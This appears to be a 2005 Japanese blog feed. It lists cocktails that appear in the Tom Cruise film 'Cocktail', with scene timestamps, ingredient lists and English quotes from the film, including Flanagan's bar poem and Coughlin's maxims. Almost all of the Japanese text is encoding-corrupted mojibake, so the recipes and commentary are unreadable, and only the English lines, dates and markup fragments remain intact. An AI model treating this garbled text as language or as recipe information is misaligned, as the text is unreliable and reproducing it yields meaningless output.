BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -@
    -”װO•ׂ‚ֵ‚ֽAƒRƒOƒ‰ƒ“‚ּ–@‘¥‚נ׀‰מ‚µ‚‚·B

    - -

    ƒRƒOƒ‰ƒ“‚ּ–@‘¥-Coughlin's Law

    - -

    d–‚נ’T‚µ‚ִ‚¢‚יƒtƒ‰ƒiƒKƒ“‚ֹ‘־‚µ‚ִ(9'25)
    -ud–‚ֽ’§ם‚ָ‚טv
    -Anything else is always something better

    - -

    ˆךl‚ּq‚ֹ‚¼‚ֱ‚±‚ס‚ֹ‚ָ‚ט‚»‚₪‚ֹ‚ָ‚ֱ‚ִ‚¢‚יƒtƒ‰ƒiƒKƒ“‚ֹ‘־‚µ‚ִ(37'46)
    -u‚¨‚¢‚µ‚¢—‚ֹ‚²’ˆ׃v
    -Never tell tales about a waoman.She'll hear you no matter how far away she is

    - -

    ƒtƒ‰ƒiƒKƒ“‚×ִ‰ן‚µ‚½ƒRƒOƒ‰ƒ“‚ֹ‘־‚µ‚ִ(43'15)
    -u‚½‚ֶ‚¦‹ֱ‚¢‚ִ‚אƒN[ƒ‹‚ֹv
    -Never show surprise.Never lose your cool.

    - -

    ƒRƒOƒ‰ƒ“‚ּƒtƒ‰ƒiƒKƒ“‚ֹ‘־‚·‚יˆג‘‚ֵ(1:33'05)
    -u€l‚ֽ‚ֹ‚¨‚₪‘O‚ֹ–„‚‚כv
    -Bury the dead. They stink up the joint.

    - -

    ¦‘S‚ִ–ף‚ֽDVD‚ּ‚א‚ּ‚נQl‚ֹ‚µ‚‚µ‚½B

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Vj - -2005-04-17T20:48:29Z -2005-03-28T12:25:12Z -tag:www.milliontimes.jp,2005:/column//2.56 -2005-03-28T12:25:12Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒWƒ…Eƒ_ƒ€[ƒ‹•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y37'09‚²‚כz
    -
    -ƒRƒOƒ‰ƒ“‚ֶ‚ּ“q‚¯‚ֵƒtƒ‰ƒiƒKƒ“‚ֽ‚¨‹א‚¿‚ּ—«‚נא‚«‚ֹ‚©‚©‚ט‚‚·B
    -uƒ‰ƒCƒ€‚נן‚ֱ‚½ƒEƒIƒbƒJ‚נƒƒbƒN‚ֵ’¸‘ױv
    -u‚±‚±‚ֽ“ל‚ּ“‡‚ֵ‚·‚זBƒWƒ…Eƒ_ƒ€[ƒ‹‚נ‚ּ‚ס‚ֵ‚‚ִ‚זv
    -u‚¦Hv
    -uƒWƒ…Eƒ_ƒ€[ƒ‹‚ֵ‚·Bˆ₪‚ּ`‚ֶ‚¢‚₪ˆ׃–¡‚ּƒJƒNƒeƒ‹‚ֵ‚·B‚א‚¬‚½‚ִ‚ּ‰•¨ƒWƒ…[ƒX‚נg‚₪‚ס‚ֵ‚·B‚ּ‚ס‚ֵ‚‚ִA”–¡‚µ‚¢‚±‚ֶ‚ֽ•ב‚·‚יv
    -u‚²‚‚ס‚ָ‚³‚¢A„‚ּח‚ֹQ‚½‚¢‚ֶ‘‚¢‚ִ‚ ‚יHv
    -uƒRƒ“ƒ^ƒNƒg‚µ‚ִ‚ָ‚¢‚ס‚ֵ‰½‚ֹ‚א©‚¦‚‚¹‚סBv
    -u©M‰ֶ‚ָ‚ּ‚ֻv

    - -
    ƒWƒ…Eƒ_ƒ€[ƒ‹
    •s–¾
    ‰f‘‚©‚ח©‚יְ‚טAƒ‰ƒ€‚ּƒpƒCƒ“ƒWƒ…[ƒX„‚ט‚ֹƒ`ƒFƒ[ƒuƒ‰ƒ“ƒf[‚נ‚‚ח‚·‚ס‚ֵ‚µ‚ו‚₪‚©BB]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Uj - -2005-04-17T20:48:11Z -2005-03-28T12:05:54Z -tag:www.milliontimes.jp,2005:/column//2.55 -2005-03-28T12:05:54Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒ_ƒCƒLƒ•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y43'43‚²‚כz
    -
    -ƒtƒ‰ƒiƒKƒ“‚ִֶ‰ן‚µ‚½ƒRƒOƒ‰ƒ“‚ֽuƒo[ƒeƒ“‚³‚סƒƒbƒhƒAƒC‚נל‚ֱ‚ִ‚­‚ך‚ָ‚¢‚©‚ָv‚ֶ÷‚נ‚©‚¯‚‚·BֵI“I‚ֹ‚ֽƒtƒ[ƒYƒ“ƒ_ƒCƒLƒ‚נˆש‚‚‚·BƒWƒƒƒ}ƒCƒJ‚ֵƒ_ƒCƒLƒ‚ֶ‚¢‚₪‚ֶ•’‚ֹƒtƒ[ƒYƒ“ƒ_ƒCƒLƒ‚×o‚ִ‚­‚י‚ּ‚ֵ‚µ‚ו‚₪‚©BBB
    ƒ_ƒCƒLƒ
    -ƒ‰ƒ€@3^4
    -ƒ‰ƒCƒ€ ƒWƒ…[ƒX@1^4
    -»“@1tsp

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Tj - -2005-04-17T20:47:58Z -2005-03-28T12:03:49Z -tag:www.milliontimes.jp,2005:/column//2.54 -2005-03-28T12:03:49Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒXƒNƒƒ…[ƒhƒ‰ƒCƒo[•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y37'09‚²‚כz
    -
    -ƒtƒ‰ƒiƒKƒ“‚ֽƒRƒOƒ‰ƒ“‚ֶƒLƒX‚נ‚µ‚ִ‚¢‚י‚ּ‚נ©‚ִA•s–ש‰ץ‚ֹ‚ָ‚ט‚‚·B‚»‚ס‚ָ’†A‹q‚©‚חƒXƒNƒƒ…[ƒhƒ‰ƒCƒo[‚נ’•¶‚³‚ך•s‹@™‚ֹ•·‚«•װ‚µ‚‚·B
    ƒXƒNƒƒ…[ƒhƒ‰ƒCƒo[
    -ƒEƒIƒbƒJ@30ml
    -ƒIƒƒ“ƒWƒWƒ…[ƒX@“K—

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Sj - -2005-04-17T20:47:44Z -2005-03-28T11:53:19Z -tag:www.milliontimes.jp,2005:/column//2.53 -2005-03-28T11:53:19Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒZƒbƒNƒXEƒIƒ“EƒUEƒr[ƒ`^ƒxƒ‹ƒxƒbƒgEƒnƒ“ƒ}[^ƒAƒ‰ƒoƒ}EƒXƒ‰ƒ“ƒ}[^ƒsƒ“ƒN¥ƒXƒNƒƒƒ‹^ƒXƒ[ƒgƒEƒhEƒXƒ[^ƒAƒCƒXƒeƒB[(ice-T)^ƒJƒ~ƒJƒ[^ƒI[ƒKƒYƒ€^ƒfƒXEƒXƒpƒYƒ€i€‚ּבz¹m‚¯‚¢‚ך‚סnj^ƒVƒ“ƒKƒ|[ƒ‹EƒXƒƒ“ƒO^ƒfƒBƒ“ƒKƒƒ“•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y28'50‚²‚כz
    -
    -ƒ|ƒGƒ€‚נ‰r‚ס‚¾ƒtƒ‰ƒiƒKƒ“‚נ‚‚ִˆךl‚ּ—«‹q‚׃I[ƒKƒYƒ€‚נˆש‚ס‚ֵ‚‚½‚¢‚ֶ‚¢‚¢‚‚·‚×Aƒtƒ‰ƒiƒKƒ“‚ֽƒ^[ƒRƒCƒYEƒuƒ‹[‚נ©‚‚‚·B
    -u„‚אƒI[ƒKƒYƒ€‚נ‚µ‚ִ‚‚½‚¢‚םv
    -u‚ַ‚ך‚¾‚¯—~‚µ‚¢‚ס‚¾‚¢Hv
    -u‚¦A‚¦‚¥B‚½‚­‚³‚סv
    -u‚‚¸‚ֽAƒ^[ƒRƒCƒYEƒuƒ‹[‚ֹ‚µ‚ִ‚‚ָ‚זBv
    ƒI[ƒKƒYƒ€
    -ƒNƒ[ƒ€ ƒƒLƒ…[ƒ‹@20ml
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@20ml
    -ƒAƒ}ƒƒbƒg 15ml
    -¶ƒNƒ[ƒ€@15ml
    -‹“@15ml

    - -

    ƒ^[ƒRƒCƒYEƒuƒ‹[
    -ƒ‰ƒ€@30ml
    -ƒzƒƒCƒg ƒLƒ…ƒ‰ƒ\[@15ml
    -ƒuƒ‹[ ƒLƒ…ƒ‰ƒ\[@15ml
    -ƒƒ‚ƒ“ ƒWƒ…[ƒX@1tsp
    -ƒpƒCƒiƒbƒvƒ‹ ƒWƒ…[ƒX “K—

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Rj - -2005-04-17T20:47:08Z -2005-03-28T10:53:51Z -tag:www.milliontimes.jp,2005:/column//2.52 -2005-03-28T10:53:51Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒI[ƒKƒYƒ€^ƒ^[ƒRƒCƒYEƒuƒ‹[•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y28'50‚²‚כz
    -
    -@CELL BLOC‚ֶ‚¢‚₪ƒo[‚ֹƒXƒJƒEƒg‚³‚ך‚½ƒtƒ‰ƒiƒKƒ“‚ֶƒRƒOƒ‰ƒ“B‚»‚±‚ֵƒtƒ‰ƒiƒKƒ“‚ׂ¨‹q‚©‚ח‹‚‚ח‚ך‚ִƒ|ƒGƒ€‚נ‰r‚‚‚·B

    - -

    I see America drinking... the fabulous cocktails I make.
    -America's getting stinking on something I stir or shake
    -The Sex on the Beach... the schnapps made from peach... the Velvet Hammer, the Alabama Slammer.
    -I make things with juice and froth... the Pink Squirrel, the Three-Toed Sloth.
    -I make drinks so sweet and snazzy... the Ice-T, Kamikaze.
    -The Orgasm.
    -The Death Spasm.
    -The Singapore Sling, the Ding-a-ling.
    -America, you're just devoted... to every flavor I've got.
    -But if you want to get loaded... why don't you just order a shot?


    ƒZƒbƒNƒXEƒIƒ“EƒUEƒr[ƒ`
    -ƒƒƒ“ ƒƒLƒ…[ƒ‹@20ml
    -ƒEƒHƒbƒJ@15ml
    -ƒNƒ[ƒ€ ƒh ƒtƒ‰ƒ“ƒ{ƒ[ƒY@10ml
    -ƒpƒCƒiƒbƒvƒ‹ ƒWƒ…[ƒX@80ml
    -ˆ׃O‚ֹ‚¨‚¢‚µ‚¢‚ֵ‚·B

    - -

    ƒxƒ‹ƒxƒbƒgEƒnƒ“ƒ}[
    -ƒzƒƒCƒg ƒLƒ…ƒ‰ƒ\[@1/3
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@1/3
    -¶ƒNƒ[ƒ€@1/3

    - -

    ƒAƒ‰ƒoƒ}EƒXƒ‰ƒ“ƒ}[
    -ƒAƒ}ƒƒbƒg@2^5
    -ƒTƒUƒ“ ƒJƒ“ƒtƒH[ƒg@2^5
    -ƒXƒ[ ƒWƒ“ @1^5
    -ƒƒ‚ƒ“ ƒWƒ…[ƒX@1tsp
    -’¼–ף‚·‚י‚ֶhƒAƒ‰ƒoƒ}‚ּƒiƒ“ƒpth

    - -

    ƒsƒ“ƒN¥ƒXƒNƒƒƒ‹
    -ƒNƒ[ƒ€ ƒh ƒmƒƒˆ[@2/4
    -ƒzƒƒCƒg ƒNƒ[ƒ€ ƒh ƒJƒJƒI@1/4
    -¶ƒNƒ[ƒ€@1/4

    - -

    ƒXƒ[ƒgƒEƒhEƒXƒ[
    -•s–¾

    - -

    ƒAƒCƒXƒeƒB[(ice-T)
    -ƒs[ƒ`ƒƒLƒ…[ƒ‹@15ml
    -ƒ‰ƒ€@30ml
    -‚V‚t‚o@‚P^‚Q
    -ƒNƒ‰ƒ“ƒxƒ[ƒWƒ…[ƒX@“K—

    - -

    ƒJƒ~ƒJƒ[
    -ƒEƒHƒbƒJ@45ml
    -ƒ‰ƒCƒ€ƒWƒ…[ƒX@15ml
    -ƒzƒƒCƒgEƒLƒ…ƒ‰ƒ\[@1tsp.
    -–¼‘O‚©‚ח‚ֽˆ׃OB“ת–{נ‚ֽ“‚ֱ‚ִ‚¢‚‚¹‚סB

    - -

    ƒI[ƒKƒYƒ€
    -ƒNƒ[ƒ€ ƒƒLƒ…[ƒ‹@20ml
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@20ml
    -ƒAƒ}ƒƒbƒg 15ml
    -¶ƒNƒ[ƒ€@15ml
    -‹“@15ml

    - -

    ƒfƒXEƒXƒpƒYƒ€i€‚ּבz¹m‚¯‚¢‚ך‚סnj
    -•s–¾

    - -

    ƒVƒ“ƒKƒ|[ƒ‹EƒXƒƒ“ƒO
    -ƒWƒ“@45ml
    -ƒ`ƒFƒ[ ƒuƒ‰ƒ“ƒf[@20ml
    -ƒƒ‚ƒ“ ƒWƒ…[ƒX@20ml
    -ƒ\[ƒ_@“K—
    -ƒ`ƒFƒ[ƒuƒ‰ƒ“ƒf[‚ֽƒtƒ[‚ֶ‚·‚י

    - -

    ƒfƒBƒ“ƒKƒƒ“
    -•s–¾

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Qj - -2005-04-17T20:46:49Z -2005-03-28T10:16:24Z -tag:www.milliontimes.jp,2005:/column//2.51 -2005-03-28T10:16:24Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒn[ƒxƒCEƒEƒHƒ‹ƒoƒ“ƒK[^ƒxƒ‹ƒxƒbƒgEƒnƒ“ƒ}[^ƒLƒ…[ƒoƒƒuƒ^ƒI[ƒKƒYƒ€^ƒuƒ‰ƒbƒfƒBƒƒAƒ[^ƒsƒ“ƒN¥ƒXƒNƒƒƒ‹^ƒGƒ“ƒWƒFƒ‹EƒfƒBƒbƒv^ƒ_[ƒeƒB[Eƒ}ƒU[^ƒeƒBƒ“ƒKƒƒ“^ƒ}ƒeƒB[ƒj•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y10'41‚²‚כz
    -
    -@ƒRƒOƒ‰ƒ“‚ֶˆך‚ֹ“­‚­‚±‚ֶ‚ֹ‚ָ‚ֱ‚½ƒtƒ‰ƒiƒKƒ“A‚µ‚©‚µƒƒVƒs‚א’m‚ח‚ָ‚¢‚‚‚ֵƒJƒEƒ“ƒ^[‚ֹ“‚ט‹q‚©‚חX‚ֶ’•¶‚נף‚¯‚ִ‘ו•ֿ‚ָ‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B‚±‚ךˆָO‚ֹ‚א”’ƒƒCƒ“‚גƒWƒ€Eƒr[ƒ€Aƒ‚ƒ‹ƒ\ƒ“‚ּ’•¶‚אBBB

    -ƒn[ƒxƒCEƒEƒHƒ‹ƒoƒ“ƒK[
    -ƒEƒHƒbƒJ@30ml
    -ƒIƒƒ“ƒWƒWƒ…[ƒX@“K—
    -ƒKƒƒA[ƒm‚נ•‚‚©‚׳‚‚·BƒvƒƒT[ƒtƒ@[‚ּƒn[ƒxƒC‚ׂ₪‚ֶ•ַ‚נ‚½‚½‚«‚ָ‚ׂח‹A‚י‚ֶ‚±‚כ‚©‚ח–¼‘O‚נ‚ֲ‚¯‚ח‚ך‚½‚»‚₪‚ֵ‚·B

    - -

    ƒxƒ‹ƒxƒbƒgEƒnƒ“ƒ}[
    -ƒzƒƒCƒg ƒLƒ…ƒ‰ƒ\[@1^3
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@1^3
    -¶ƒNƒ[ƒ€@1^3
    -ƒVƒFƒCƒN‚µ‚‚·B

    - -

    ƒLƒ…[ƒoƒƒuƒ
    -ƒ‰ƒ€@30ml
    -ƒR[ƒ‰@“K—
    -ƒtƒ‰ƒiƒKƒ“‚׃EƒGƒCƒ^[‚ֹƒ‰ƒ€EƒR[ƒN‚ּ‚±‚ֶ‚¶‚ב‚ָ‚¢‚©‚ֶ“{‚ֱ‚ִ‚‚·B

    - -

    ƒI[ƒKƒYƒ€
    -ƒNƒ[ƒ€ ƒƒLƒ…[ƒ‹@20ml
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@20ml
    -ƒAƒ}ƒƒbƒg 15ml
    -¶ƒNƒ[ƒ€@15ml
    -‹“@15ml
    -‚¨‚¢‚µ‚¢‚ס‚ֵ‚·‚¯‚ַ—‚‚ֳ‚ח‚¢BB

    - -

    ƒuƒ‰ƒbƒfƒBEƒƒAƒ[
    -ƒEƒHƒbƒJ@30ml
    -ƒƒ‚ƒ“ ƒWƒ…[ƒX@1tsp
    -ƒgƒ}ƒg ƒWƒ…[ƒX@“K—
    -ƒWƒ“ƒx[ƒX‚¾‚ֶƒuƒ‰ƒbƒfƒBEƒTƒ€‚ֹ‚ָ‚ט‚‚·B

    - -

    ƒsƒ“ƒN¥ƒXƒNƒƒƒ‹
    -ƒNƒ[ƒ€ ƒh ƒmƒƒˆ[@2/4
    -ƒzƒƒCƒg ƒNƒ[ƒ€ ƒh ƒJƒJƒI@1/4
    -¶ƒNƒ[ƒ€@1/4
    -ƒsƒ“ƒN‚ּ“ס‚ֶ‚¢‚₪ˆ׃–¡‚ֵ‚·B

    - -

    ƒGƒ“ƒWƒFƒ‹EƒfƒBƒbƒv
    -ƒNƒ[ƒ€ ƒh ƒJƒJƒI@3/4
    -¶ƒNƒ[ƒ€@1/4
    -ƒ}ƒ‰ƒXƒL[ƒmƒ`ƒFƒ[@1ֲ
    -ƒVƒFƒCƒN‚µ‚‚·B

    - -

    ƒ_[ƒeƒB[Eƒ}ƒU[
    -ƒuƒ‰ƒ“ƒf[@40ml
    -ƒR[ƒq[ ƒƒLƒ…[ƒ‹@20ml
    -D‚«‚ָl‚ֽD‚«‚ֵ‚·‚ז‚ֻB

    - -

    ƒeƒBƒ“ƒKƒƒ“iDing-a-lingj
    -•s–¾‚ֵ‚·B’m‚ט‚‚¹‚סB

    - -

    ƒ}ƒeƒB[ƒj
    -ƒWƒ“@3^4
    -ƒhƒ‰ƒC ƒxƒ‹ƒ‚ƒbƒg@1^4
    -ƒIƒ[ƒu@1ֲ
    -ƒƒ‚ƒ“ƒs[ƒ‹‚µ‚‚·B

    ]]> -

    ]]> -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i‚Pj - -2005-04-17T20:46:29Z -2005-03-28T09:00:22Z -tag:www.milliontimes.jp,2005:/column//2.50 -2005-03-28T09:00:22Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּ‰f‰זuƒJƒNƒeƒ‹v‚ֹ‚ֵ‚ִ‚­‚יƒJƒNƒeƒ‹‚נ׀‰מBƒƒbƒhƒAƒC^ƒ}ƒeƒB[ƒj•ׂ - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B
    -y9'30‚²‚כz
    -
    -@ƒuƒ‰ƒCƒAƒ“Eƒtƒ‰ƒiƒKƒ“(Tom Cruise)‚ׂm‚x‚ֹo‚ִ‚«‚ִd–‚נ’T‚»‚₪‚ֶ‚µ‚‚·‚×A‚ָ‚©‚ָ‚©©‚ֲ‚©‚ח‚¸‚³‚‚ז‚ֱ‚ִ‚¢‚י‚ֶA‚ ‚יƒo[‚ֵ‹l‚×B‚»‚±‚ֵ“­‚«‚½‚¢‚ֶ\‚µo‚י‚ֶAƒ_ƒOƒ‰ƒXEƒRƒOƒ‰ƒ“(Bryan Brown)‚©‚ח
    -You know how to make a "Red Eye"?iƒƒbƒhƒAƒC‚ֽ‚ַ‚₪‚ג‚ֱ‚ִל‚י‚©’m‚ֱ‚ִ‚י‚©‚¢Hj
    -What about a vodka martini with a Pernod float?iƒyƒ‹ƒm‚נƒtƒ[ƒg‚³‚¹‚½ƒEƒIƒbƒJƒ}ƒeƒB[ƒj‚ֽHj
    -‚ֶ•·‚©‚ך‚‚·B
    ƒƒbƒhƒAƒC
    -ƒr[ƒ‹@1^2
    -ƒgƒ}ƒgƒWƒ…[ƒX@1^2
    -“ס“ת‚¢‚ֹר‚­‚ֶ¾‚ם‚ך‚ִ‚¢‚יˆש‚•¨BƒRƒOƒ‰ƒ“‚ּ‘וD•¨‚ּ‚ז‚₪‚ֵ•¨ך’†—ַ‚­o‚ִ‚­‚יB“ס“ת‚¢‚ּ–‚©‚ח–½–¼‚³‚ך‚ִ‚¢‚יB‚¿‚ָ‚‚ֹA–{•ׂ’†‚ֵƒRƒOƒ‰ƒ“‚×¶—‘‚נ“‚ך‚ִ‚¢‚י‚×A‚±‚ך‚ֽA”‚ּƒIƒƒWƒiƒ‹‚ֵ‚·B‚µ‚½‚­‚ָ‚¢‚ֵ‚·‚¯‚ַBBB

    - -

    ƒEƒIƒbƒJƒ}ƒeƒB[ƒj
    -ƒEƒIƒbƒJ@3^4
    -ƒhƒ‰ƒCƒxƒ‹ƒ‚ƒbƒg@1^4
    -ƒIƒ[ƒu@1ֲ
    -–{•ׂ’†‚ֹo‚ִ‚­‚יƒyƒ‹ƒm“‚ט‚ּ‚א‚ּ‚ֽ‚ַ‚ס‚ָƒƒVƒs‚ָ‚ּ‚©•ׂ©‚ט‚‚¹‚סB‚¨‚»‚ח‚­Aƒxƒ‹ƒ‚ƒbƒg‚ּ‘ד‚ם‚ט‚ֹƒyƒ‹ƒm‚נ“‚ך‚ִƒtƒ[ƒg‚³‚¹‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚©‚ֶv‚¢‚‚·BƒEƒHƒbƒJ ƒAƒCƒXƒo[ƒO‚ּ‚ז‚₪‚ָ‚א‚ּ‚ֵ‚µ‚ו‚₪‚©B’m‚ֱ‚ִ‚י•AƒRƒƒ“ƒg‚µ‚ִ‚­‚¾‚³‚¢B“ת–{‚ֵ‚ֽƒ}ƒeƒB[ƒj‚ֶ‚¢‚¦‚־ƒWƒ“ƒx[ƒX‚ֵ‚·‚×AƒAƒƒƒJ‚ֵ‚ֽƒEƒIƒbƒJ‚ב½‚¢‚»‚₪‚ֵ‚·B

    ]]> -

    ]]> -
    -
    - -‚ֱ•¥‚¢‚ּ³‚µ‚¢‰מ•ר‚ּd• - -2005-04-17T20:44:22Z -2005-03-17T02:25:11Z -tag:www.milliontimes.jp,2005:/column//2.49 -2005-03-17T02:25:11Z -@‰‚‚ֹ‘‚¢‚ִ‚¨‚«‚‚·‚ׂ·‚²[‚­‚ֱ‚ִ‚µ‚‚₪‘O‚ֹ‚ט‚ּl‚×~‚‚ִ‚ ‚°‚י‚ּ‚×מ–{‚ֵ‚·BuƒCƒbƒLv‚ֶ‚©כ¯‚ֵ‚·B‚‚ַ‚‚ַ‚ֹB‚»‚ּד‚ֵA‚ג‚ֱ‚ֿ‚ט’׳‚ך‚¿‚ב‚₪l‚ֱ‚ִ‚¢‚‚·‚ז‚ֻB‚»‚ּ‚ּ‘־ˆ–@B @‚‚¸Aמ–{“I‚ֹ¬’°‚ֵ‘ּ“אi‰t’†j‚ֹ“‚ֱ‚½‚¨נ‚ֽװ‚×... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -240health - -@‰‚‚ֹ‘‚¢‚ִ‚¨‚«‚‚·‚ׂ·‚²[‚­‚ֱ‚ִ‚µ‚‚₪‘O‚ֹ‚ט‚ּl‚×~‚‚ִ‚ ‚°‚י‚ּ‚×מ–{‚ֵ‚·BuƒCƒbƒLv‚ֶ‚©כ¯‚ֵ‚·B‚‚ַ‚‚ַ‚ֹB‚»‚ּד‚ֵA‚ג‚ֱ‚ֿ‚ט’׳‚ך‚¿‚ב‚₪l‚ֱ‚ִ‚¢‚‚·‚ז‚ֻB‚»‚ּ‚ּ‘־ˆ–@B

    - -

